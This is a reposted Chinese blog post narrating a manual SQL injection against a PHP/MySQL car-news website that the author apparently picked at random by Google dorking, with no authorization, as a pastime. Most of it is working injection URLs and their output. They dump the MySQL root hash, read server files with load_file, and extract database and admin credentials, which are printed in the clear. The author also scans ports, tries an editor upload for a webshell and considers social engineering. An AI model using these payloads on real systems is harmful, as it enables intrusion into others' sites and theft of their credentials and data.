一次典型的php+MySQL手工注射

2023-10-17 11:59
文章标签 mysql php 一次 database 典型 手工 注射

本文主要是介绍一次典型的php+MySQL手工注射,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一次典型的php+MySQL手工注射

大家好我是xxx,闲着无聊找个网站练练手,请出google “inurl:php?id=80 site:XXX 关键字”
很快找到一个有漏洞的网站:

http://www.hacked.cn/autocar/show.php?id=42

加”‘”,网页部分内容消失。and 1=1 正常;and 1=2消失。存在注入漏洞,好就件捡软柿子捏!
判断mysql版本:

06182049-df371ce401074a138782da8150ca7ec5.png
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=4正常
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=5不正常。
order by 1;order by 2正常,order by 3不正常。字段2个。
检测基本信息:
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(@@version,0x3a,database(),0x3a,user()),2
得到
—————————
4.0.20a-nt:qiche:root@localhost
—————————
mysql用户root,mysql 4.0没法通过information_schema得到表名

只能才猜了
http://www.hacked.cn/autocar/show.php?id=42 union select 1.2 from admin
猜了常见的表名的均失败!郁闷!
尝试读取root密码
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(user,0x3a,password),2 from mysql.user
返回:
———————————
root:5fcbb1f400e20be1
———————————
得到mysql的root密码可以用cain去破解,这个暂时放着。

查询文件权限。
http://www.hacked.cn/autocar/show.php?id=-42 union select file_priv,2 from mysql.user
返回
——————————-
Y
——————————-
有读取文件的权限,由mysql版本4.0.20a-nt得知目标主机为Window系统。
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(‘c:\\boot.ini’),2
仍然返回空白,说明magic_qoutes=on,由于magic_qoutes=on我们无法通过 into outfile 来写shell。
郁闷!
但是我们可以读源文件!这就够了!

‘c:\\boot.ini’16进制编码0x633a5c626f6f742e696e69
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(0x633a5c626f6f742e696e69),2
返回:
——————————–
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT=”Microsoft Windows 2000 Server” /fastdetect
——————————-
目标主机系统Window2000确定. 下一步找后台,

http://www.hacked.cn/autocar/admin/

返回
——————————-
Warning: main(autocar/adodb/conn.php) [function.main]: failed to open stream: No such file or directory in D:\qicheweb\autocar/admin\index.php on line 1

Fatal error: main() [function.require]: Failed opening required ‘autocar/adodb/conn.php’ (include_path=’.;D:\RUIOA\webroot;D:\RUIOA\webroot\includes;D:\ruioa\RUIOA\php\pear’) in D:\qicheweb\autocar/admin\index.php on line 1
——————————–
直接告诉了我们数据库连接文件以及web路径,人品爆发了啊。

D:\qicheweb\autocar/adodb\conn.php
D:\qicheweb\autocar/admin\index.php
接着找后台,两下猜中了!
后台地址:

http://www.hacked.cn/autocar/login.php

查看表单,猜测管理员表名,没什么作用。

开始用load_file读源文件

D:\\qicheweb\\autocar\\adodb\\conn.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c61646f64625c636f6e6e2e706870),2

返回
——————————–
……
PConnect(’127.0.0.1′,’root’,'myoa888′,’qiche’);
……
$ypsm=1; $lxjsm=2; mysql_query(“SET NAMES GB2312″); /* $kd_conn = &ADONewConnection(‘mysql’); $kd_conn->PConnect(’127.0.0.1′,’highway’,'highway4438′,’highway’); */ $kd_conn=$conn; function err(){ echo
——————————–
获得mysql帐号密码
(’127.0.0.1′,’root’,'myoa888′,’qiche’)
(’127.0.0.1′,’highway’,'highway4438′,’highway’)

用得到的密码连接mysql,结果mysql不支持外连

用nmap顺便扫一下端口
——————————–
alone@alone-desktop:~/crk$ nmap -sT 127.0.0.1 -p 21,23,80,3306,1433,3389

Starting Nmap 4.53 ( http://insecure.org ) at 2009-08-23 16:58 CST
Interesting ports on 127.0.0.1:
PORT     STATE    SERVICE
21/tcp   open     ftp
23/tcp   filtered telnet
80/tcp   open     http
1433/tcp filtered ms-sql-s
3306/tcp open     mysql
3389/tcp open     ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 1.720 seconds
——————————–
用得到的帐号尝试ftp也登录不成功且ftp的banner显示
220 Serv-U FTP Server v6.1 for WinSock ready…
提权的时候可能用得到,这是后话不提。

接着读文件找到后台的表单和字段。
D:\\qicheweb\\autocar/\login.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c6c6f67696e2e706870),2

查看源代码,查找action
——————————–
<form name=”form1″ method=”post” action=”login_check.php”>
——————————–

读D:\\qicheweb\\autocar\\login_check.php
密码不对这接转到别的页面,不让我查看代码。郁闷!
用repalce函数将load_file结果中的‘<’(0x3c)换成‘:’(0x3a)

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

找到
——————————–
if($username!=”" && $password!=”"){

$sql=”select ad_jb,ad_username from lm_admin where ltrim(rtrim(ad_username))=’$username’ and ltrim(rtrim(ad_password))=’$password’”;
// echo $sql;
$rs=$conn->Execute($sql);
——————————–
有了表名和字段名,现在我们直接读出后台密码

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20concat(ad_username,0x3a,ad_password),2%20from%20lm_admin

得到
some:some
登录后台居然发现没法得到webshell,发现用的是
eWebEditor编辑器,而且web支持列目录。
找了半天
eWebEditor/upload.php里面有javascript验证后缀名,而且没有session验证可以直接上传,本地保存成html,添加php后缀允许上传。
结果jpg的文件能上传,php的还是传不上去。
eWebEditor目录

接着读下eWebEditor/upload.php源文件吧
——————————-
……
//检测扩展名的有效性

function CheckValidExt($sExt)
{
global $sAllowExt;
$aExt = explode("|",$sAllowExt);
if (in_array($sExt, $aExt)) {
Return 1;
} else {
OutScript("parent . UploadError('提示:\n\n请选择一个有效的文件,\n支持的格式有 ($sAllowExt)!')");
Return 0;
}
}

……
——————————-
发现php文件中貌似也检测了文件的后缀。
入侵就暂时到此吧。得到了新闻管理系统的后台。
我们可以读源文件,可以把文件挨着读出来说不定能找到一些漏洞呢。考虑到开了ftp,3389,可以尝试社会工程学,把数据库的密码都读去出来,用得到的密码尝试破解ftp或者3389。
真麻烦,不弄了就是玩玩跟他们又没仇何必那么认真啊。

来源: <http://www.0x50sec.org/pentest/2010/03/id/183/>

 

转载于:https://www.cnblogs.com/holyes/p/c7eb6b07df7a73ac88464f7418f86148.html

这篇关于一次典型的php+MySQL手工注射的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/225231

相关文章

MySQL中删除重复数据SQL的三种写法

MySQL中删除重复数据SQL的三种写法

《MySQL中删除重复数据SQL的三种写法》:本文主要介绍MySQL中删除重复数据SQL的三种写法,文中通过代码示例讲解的非常详细,对大家的学习或工作有一定的帮助,需要的朋友可以参考下... 目录方法一:使用 left join + 子查询删除重复数据(推荐)方法二:创建临时表(需分多步执行,逻辑清晰,但会
阅读更多...
Mysql 中的多表连接和连接类型详解

Mysql 中的多表连接和连接类型详解

《Mysql中的多表连接和连接类型详解》这篇文章详细介绍了MySQL中的多表连接及其各种类型,包括内连接、左连接、右连接、全外连接、自连接和交叉连接,通过这些连接方式,可以将分散在不同表中的相关数据... 目录什么是多表连接?1. 内连接(INNER JOIN)2. 左连接(LEFT JOIN 或 LEFT
阅读更多...
mysql重置root密码的完整步骤(适用于5.7和8.0)

mysql重置root密码的完整步骤(适用于5.7和8.0)

《mysql重置root密码的完整步骤(适用于5.7和8.0)》:本文主要介绍mysql重置root密码的完整步骤,文中描述了如何停止MySQL服务、以管理员身份打开命令行、替换配置文件路径、修改... 目录第一步:先停止mysql服务,一定要停止!方式一:通过命令行关闭mysql服务方式二:通过服务项关闭
阅读更多...
SQL Server数据库磁盘满了的解决办法

SQL Server数据库磁盘满了的解决办法

《SQLServer数据库磁盘满了的解决办法》系统再正常运行,我还在操作中,突然发现接口报错,后续所有接口都报错了,一查日志发现说是数据库磁盘满了,所以本文记录了SQLServer数据库磁盘满了的解... 目录问题解决方法删除数据库日志设置数据库日志大小问题今http://www.chinasem.cn天发
阅读更多...
mysql主从及遇到的问题解决

mysql主从及遇到的问题解决

《mysql主从及遇到的问题解决》本文详细介绍了如何使用Docker配置MySQL主从复制,首先创建了两个文件夹并分别配置了`my.cnf`文件,通过执行脚本启动容器并配置好主从关系,文中还提到了一些... 目录mysql主从及遇到问题解决遇到的问题说明总结mysql主从及遇到问题解决1.基于mysql
阅读更多...
电脑多久清理一次灰尘合? 合理清理电脑上灰尘的科普文

电脑多久清理一次灰尘合? 合理清理电脑上灰尘的科普文

《电脑多久清理一次灰尘合?合理清理电脑上灰尘的科普文》聊起电脑清理灰尘这个话题,我可有不少话要说,你知道吗,电脑就像个勤劳的工人,每天不停地为我们服务,但时间一长,它也会“出汗”——也就是积累灰尘,... 灰尘的堆积几乎是所有电脑用户面临的问题。无论你的房间有多干净,或者你的电脑是否安装了灰尘过滤器,灰尘都
阅读更多...
MySQL的索引失效的原因实例及解决方案

MySQL的索引失效的原因实例及解决方案

《MySQL的索引失效的原因实例及解决方案》这篇文章主要讨论了MySQL索引失效的常见原因及其解决方案,它涵盖了数据类型不匹配、隐式转换、函数或表达式、范围查询、LIKE查询、OR条件、全表扫描、索引... 目录1. 数据类型不匹配2. 隐式转换3. 函数或表达式4. 范围查询之后的列5. like 查询6
阅读更多...
Linux下MySQL8.0.26安装教程

Linux下MySQL8.0.26安装教程

《Linux下MySQL8.0.26安装教程》文章详细介绍了如何在Linux系统上安装和配置MySQL,包括下载、解压、安装依赖、启动服务、获取默认密码、设置密码、支持远程登录以及创建表,感兴趣的朋友... 目录1.找到官网下载位置1.访问mysql存档2.下载社区版3.百度网盘中2.linux安装配置1.
阅读更多...
PHP执行php.exe -v命令报错的解决方案

PHP执行php.exe -v命令报错的解决方案

《PHP执行php.exe-v命令报错的解决方案》:本文主要介绍PHP执行php.exe-v命令报错的解决方案,文中通过图文讲解的非常详细,对大家的学习或工作有一定的帮助,需要的朋友可以参考下... 目录执行phpandroid.exe -v命令报错解决方案执行php.exe -v命令报错-PHP War
阅读更多...
PostgreSQL如何用psql运行SQL文件

PostgreSQL如何用psql运行SQL文件

《PostgreSQL如何用psql运行SQL文件》文章介绍了两种运行预写好的SQL文件的方式:首先连接数据库后执行,或者直接通过psql命令执行,需要注意的是,文件路径在Linux系统中应使用斜杠/... 目录PostgreSQ编程L用psql运行SQL文件方式一方式二总结PostgreSQL用psql运
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2